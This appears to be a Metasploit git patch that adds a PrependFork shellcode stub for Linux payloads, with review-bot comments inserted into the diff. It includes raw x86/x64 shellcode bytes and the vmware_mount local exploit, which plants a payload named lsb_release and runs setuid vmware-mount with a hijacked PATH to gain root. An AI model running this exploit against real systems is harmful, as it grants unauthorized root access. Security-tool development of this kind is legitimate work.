From b913fcf1a721cc99f192ff1810f1a20acf400014 Mon Sep 17 00:00:00 2001
From: James Lee
Date: Wed, 4 Sep 2013 00:14:59 -0500
Subject: [PATCH] Add a proper PrependFork for linux

Also fixes a typo bug for AppendExit
---
 lib/msf/core/payload/linux.rb | 42 +++++++++++++++----
 modules/exploits/linux/local/vmware_mount.rb | 18 +-------
 modules/payloads/stages/linux/x64/shell.rb | 1 +
 .../payloads/stages/linux/x86/meterpreter.rb | 16 -------
 modules/payloads/stages/linux/x86/shell.rb | 2 +-
 5 files changed, 39 insertions(+), 40 deletions(-)
diff --git a/lib/msf/core/payload/linux.rb b/lib/msf/core/payload/linux.rb
index e323546128..5f205483fd 100644
--- a/lib/msf/core/payload/linux.rb
+++ b/lib/msf/core/payload/linux.rb
@@ -19,6 +19,13 @@ module Msf::Payload::Linux
 register_advanced_options(
 [
+ Msf::OptBool.new('PrependFork',
+ [
+ false,
+ "Prepend a stub that executes: if (fork()) { exit(0); }",
+ "false"
+ ]
+ ),
 Msf::OptBool.new('PrependSetresuid',
 [
 false,
@@ -97,6 +104,17 @@ module Msf::Payload::Linux
 # Prepend
+ if (datastore['PrependFork'])
+ pre << "\x6a\x02" +# pushb $0x2 #
+ "\x58" +# popl %eax #
+ "\xcd\x80" +# int $0x80 ; fork #
+ "\x85\xc0" +# test %eax,%eax #
+ "\x74\x06" +# jz 0xf #
+ "\x31\xc0" +# xor %eax,%eax #
+ "\xb0\x01" +# movb $0x1,%al ; exit #
+ "\xcd\x80" # int $0x80 #
+ end
+
 if (datastore['PrependSetresuid'])
 # setresuid(0, 0, 0)
 pre << "\x31\xc9" +# xorl %ecx,%ecx #
@@ -197,10 +215,8 @@ module Msf::Payload::Linux
 "\xcd\x80" # int $0x80 #
 end
- end
-
- # Handle all Power/CBEA code here
- if (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
+ elsif (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
 # Prepend
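Review bot: The x86 stub added under `if (datastore['PrependFork'])` never sets %ebx before the `movb $0x1,%al` / `int $0x80` exit, so the parent's exit status is whatever %ebx happened to hold, not the 0 that the new option description (`if (fork()) { exit(0); }`) promises; the x86_64 stub in the following hunk does clear %rdi first, so the two arches now disagree. Zeroing %ebx the way the x64 block zeroes %rdi, and growing the `jz` displacement by the bytes added, would make them match (the `# jz 0xf #` comment would need the same update). In both stubs a failed fork() returns a negative, hence nonzero, value and so takes the exit path as well; a comment such as `# a failed fork() (negative return) also takes the exit path, so the payload never runs` would document that. The rationale deleted from meterpreter.rb for calling exit() rather than exit_group() on threaded targets is not carried over and belongs above this block; the enclosing method begins and ends outside the hunk.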
@@ -277,9 +293,21 @@ module Msf::Payload::Linux
 "\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
 "\x44\xff\xff\x02" # sc #
 end
- end
-
- if (test_arch.include?(ARCH_X86_64))
+ elsif (test_arch.include?(ARCH_X86_64))
+
+ if (datastore['PrependFork'])
+ # if (fork()) { exit(0); }
+ pre << "\x6a\x39" # push 57 ; __NR_fork #
+ pre << "\x58" # pop rax #
+ pre << "\x0f\x05" # syscall #
+ pre << "\x48\x85\xc0" # test rax,rax #
+ pre << "\x74\x08" # jz 0x08 #
+ pre << "\x48\x31\xff" # xor rdi,rdi #
+ pre << "\x6a\x3c" # push 60 ; __NR_exit #
+ pre << "\x58" # pop rax #
+ pre << "\x0f\x05" # syscall #
+ end
 if (datastore['PrependSetresuid'])
 # setresuid(0, 0, 0)
@@ -389,8 +417,8 @@ module Msf::Payload::Linux
 # Append exit(0)
 if (datastore['AppendExit'])
 app << "\x48\x31\xff" # xor rdi,rdi #
- pre << "\x6a\x3c" # push 0x53 #
- pre << "\x58" # pop rax #
+ app << "\x6a\x3c" # push 0x3c #
+ app << "\x58" # pop rax #
 app << "\x0f\x05" # syscall #
 end
 end
diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb
index db3e9d1bab..ba83daba19 100644
--- a/modules/exploits/linux/local/vmware_mount.rb
+++ b/modules/exploits/linux/local/vmware_mount.rb
@@ -43,6 +43,7 @@ class Metasploit4 < Msf::Exploit::Local
 'DefaultOptions' => {
 "PrependSetresuid" => true,
 "PrependSetresgid" => true,
+ "PrependFork" => true,
 },
 'Privileged' => true,
 'DefaultTarget' => 0,
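Review bot: `"PrependFork" => true` in vmware_mount.rb's DefaultOptions only takes effect for payloads that mix in Msf::Payload::Linux and read that datastore key; a payload without the mixin accepts the value and ignores it silently, whereas the inline stub this commit removes from the same module was applied to every payload unconditionally. The commit adds the mixin to the x64 and x86 shell stages, but as far as the visible hunks show there is no check that the selected payload actually honours the option. A comment beside the default, e.g. `# honoured only by payloads that include Msf::Payload::Linux; silently ignored otherwise`, would record that dependency for the next person who swaps the payload. The module's `initialize` starts and ends outside the hunk.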
@@ -73,22 +74,7 @@ class Metasploit4 < Msf::Exploit::Local
 fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
 end
- # Ghetto PrependFork action which is apparently only implemented for
- # Meterpreter.
- # XXX Put this in a mixin somewhere
- # if(fork()) exit(0);
- # 6A02 push byte +0x2
- # 58 pop eax
- # CD80 int 0x80 ; fork
- # 85C0 test eax,eax
- # 7406 jz 0xf
- # 31C0 xor eax,eax
- # B001 mov al,0x1
- # CD80 int 0x80 ; exit
- exe = generate_payload_exe(
- :code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
- )
- write_file("lsb_release", exe)
+ write_file("lsb_release", generate_payload_exe)
 cmd_exec("chmod +x lsb_release")
 cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
diff --git a/modules/payloads/stages/linux/x64/shell.rb b/modules/payloads/stages/linux/x64/shell.rb
index 8ab03efa17..cad0c23729 100644
--- a/modules/payloads/stages/linux/x64/shell.rb
+++ b/modules/payloads/stages/linux/x64/shell.rb
@@ -11,6 +11,7 @@ require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 module Metasploit3
+ include Msf::Payload::Linux
 include Msf::Sessions::CommandShellOptions
 def initialize(info = {})
diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb
index d83583fec3..45ded3f7a9 100644
--- a/modules/payloads/stages/linux/x86/meterpreter.rb
+++ b/modules/payloads/stages/linux/x86/meterpreter.rb
@@ -24,7 +24,6 @@ module Metasploit3
 'Session' => Msf::Sessions::Meterpreter_x86_Linux))
 register_options([
- OptBool.new('PrependFork', [ false, "Add a fork() / exit_group() (for parent) code" ]),
 OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ])
 ], self.class)
 end
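Review bot: `include Msf::Payload::Linux` in the x64 shell stage (and the matching line in the x86 shell.rb hunk below) registers the Prepend* advanced options on the stage, but nothing in these hunks shows the stage's generated bytes being routed through the mixin's prepend logic; if stage generation does not invoke it, the options are accepted but inert, which is worth confirming before relying on the vmware_mount default. If the prepend is applied to the stage, the fork presumably happens only after the stage has been delivered to the stager's process, not before anything runs as the removed inline stub in vmware_mount.rb did; whichever is intended, a one-line comment above the include, e.g. `# provides PrependFork/PrependSetres* for the stage; applied when the stage is generated`, would state it. The meterpreter hunk removes the old per-module `PrependFork` option; that module presumably already includes the mixin, since this commit does not add it there, but that is not visible here.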
@@ -71,21 +70,6 @@ module Metasploit3
 midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp
- if(datastore['PrependFork'])
- # fork() / parent does exit()
-
- # If the target process is threaded, this means the thread
- # will exit. exit_group() will try to close the process down
- # completely.. and if we do that, it may not be reaped
- # correctly.
- #
- # Plus, depending on the vuln, we might get multiple shots at
- # owning a finite amount of threads.
-
- midstager <<
- "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80"
- end
-
 midstager << "\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
 "\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +
diff --git a/modules/payloads/stages/linux/x86/shell.rb b/modules/payloads/stages/linux/x86/shell.rb
index c4a1a98d6d..b1af987e14 100644
--- a/modules/payloads/stages/linux/x86/shell.rb
+++ b/modules/payloads/stages/linux/x86/shell.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 module Metasploit3
-
+ include Msf::Payload::Linux
 include Msf::Sessions::CommandShellOptions
 def initialize(info = {})